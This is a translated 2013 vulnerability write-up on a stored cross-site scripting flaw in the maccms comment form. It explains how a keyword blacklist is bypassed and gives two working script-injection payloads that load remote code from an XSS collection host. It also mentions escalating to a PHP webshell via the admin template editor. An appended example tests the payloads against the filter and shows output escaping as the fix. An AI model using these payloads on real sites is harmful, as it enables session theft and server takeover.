maccms stored XSS analysis - vulnerability warning - the Black Bar Safety Net

ID MYHACK58:62201338338
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-04-17T00:00:00



Stored XSS analysis of the latest version (both the GBK and UTF-8 builds). The problem is in plus/comment/index.php, the comment-add feature, function add():

    $c_content = iconv('UTF-8', 'gb2312//IGNORE', $c_content); // author's note: wide-character SQL injection may well be possible here; not followed up
    $c_name    = badFilter(unescape($c_name));
    $c_content = badFilter(unescape($c_content));
    $c_ip      = getIP();
    if (isN($c_name)) { $c_name = "guest"; }
    $c_addtime = date('Y-m-d H:i:s', time());
    if ($c_vid == "" || $c_name == "" || $c_content == "") {
        die("<div id='comment_load'>null</div>");
    }
    $result = $db->query("insert tbl_comment(c_name,c_content,c_ip,c_addtime,c_vid,c_type) values ('".$c_name."','".$c_content."','".$c_ip."','".$c_addtime."','".$c_vid."','".$c_type."')"); // write into the database

The comment text passes through badFilter() only before it is written to the database.

badFilter() is defined in inc/label.php:

    function badFilter($Str) {
        $filters = app_filter; // constant defined in config.php
        $badKeywordArr = explode(",", $filters); // split the keyword list into an array
        for ($s_i = 0; $s_i <= count($badKeywordArr); $s_i = $s_i + 1) { // note: <= runs one index past the end of the array
            $Str = str_replace($badKeywordArr[$s_i], "***", $Str); // replace every occurrence of the keyword with ***
        }
        $funresult = $Str;
        return $funresult;
    }

The keyword list comes from config.php:

    define("app_filter", "http,//,com,cn,net,org,www");

The filter therefore works as follows.

It replaces the keywords http, //, com, cn, net, org and www with ***. That is a blacklist policy, and bypassing it is easy. The first version of the exploit was written like this:

    <script>var url=document.location.href;var head=url.substring(0,7);document.write('<script src="'+head+'xss.tw/xxx"><\/script>');</script>

It rebuilds the "http://" prefix at run time from the first seven characters of the page's own URL, so neither http nor // ever appears in the stored text, and the closing tag is written as <\/script> so that no literal // occurs there either.

But the database column has a length limit, so this exploit is too long. Hence the following shorter exploit.

It has to be submitted through an intercepting proxy: post ordinary text on the message board as normal, then modify the captured request to carry the exploit, which must be submitted URL-encoded.

exp:

    <script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>

Here "http://" is assembled from 'h' + 'ttp' + ':\/\/', so again no blacklisted keyword appears in the stored string. That is how the stored XSS is born. The effect on the front-end message board is shown in the screenshot. Once in the admin back-end, the template editor can modify any file; changing the path and file name lets one write a PHP file, i.e. a 一句话 one-line webshell. Reposted from:
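As an added example (not part of the original write-up and not maccms code), the following JavaScript ports badFilter() with the config.php keyword list, checks that both exploit strings above pass through it untouched while a naive payload does not, simulates the string assembly each payload performs in the victim's browser, and contrasts the blacklist with HTML-context output encoding. The htmlEscape() function and the sample page URL are this example's own assumptions, not anything the project ships.

```javascript
// Added example, not maccms code: a JavaScript port of maccms's badFilter()
// blacklist, the two payloads from the write-up, and a hardened alternative.
// Assumed: the keyword list is the one in config.php and the replacement is
// "***" as in inc/label.php; htmlEscape() and the sample URL below are this
// example's own, not something the project ships.

const APP_FILTER = "http,//,com,cn,net,org,www"; // from config.php

// Port of badFilter(): replace every occurrence of each keyword with "***".
// (The PHP loop also reads one index past the end of the array; an empty
// search string leaves the subject unchanged, so the port just walks the list.)
function badFilter(str) {
  let out = str;
  for (const kw of APP_FILTER.split(",")) {
    out = out.split(kw).join("***"); // str_replace semantics: all occurrences
  }
  return out;
}

// Payload 1 from the write-up: rebuild "http://" at run time from the first
// seven characters of the page's own URL. String.raw keeps the backslashes.
const PAYLOAD_LONG = String.raw`<script>var url=document.location.href;var head=url.substring(0,7);document.write('<script src="'+head+'xss.tw/xxx"><\/script>');</script>`;

// Payload 2 (the shorter one that fits the column): assemble "http://" from
// 'h' + 'ttp' + ':\/\/' so neither "http" nor "//" occurs in the stored text.
const PAYLOAD_SHORT = String.raw`<script>var a='h';var b=':\/\/';document.write('<script src="'+a+'ttp'+b+'xss.tw/xxx"><\/script>');</script>`;

// Does the blacklist pass the payload through untouched?
function survivesFilter(payload) {
  return badFilter(payload) === payload;
}

// What each payload's script tag will request, simulated without a DOM:
// the same string concatenation the payload performs in the victim's browser.
function assembledSrcLong(pageUrl) {
  const head = pageUrl.substring(0, 7); // "http://" on a plain-HTTP site
  return head + "xss.tw/xxx";
}
function assembledSrcShort() {
  const a = "h", b = ":\/\/"; // \/ is just / inside a JS string literal
  return a + "ttp" + b + "xss.tw/xxx";
}

// Hardened alternative (this example's suggestion): encode for the HTML
// context instead of blacklisting substrings. Equivalent to PHP's
// htmlspecialchars($s, ENT_QUOTES). Applied on output, a stored payload can
// no longer open a tag, whatever substrings it was assembled from.
function htmlEscape(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Demo when run directly with node (the sample page URL is made up).
if (typeof require !== "undefined" && require.main === module) {
  console.log(badFilter("see http://www.example.com"));
  console.log(survivesFilter(PAYLOAD_LONG), survivesFilter(PAYLOAD_SHORT));
  console.log(assembledSrcLong("http://victim.example/plus/comment/index.php"));
  console.log(htmlEscape(PAYLOAD_SHORT));
}
```

The point the two payloads make is that a substring blacklist is checked once, at storage time, against text that the browser will later execute as code; any construct that builds the forbidden substring at run time (URL slicing, concatenation, escaping a slash as \/) defeats it. Encoding for the output context instead, as htmlEscape() does, does not depend on guessing which substrings an attacker needs.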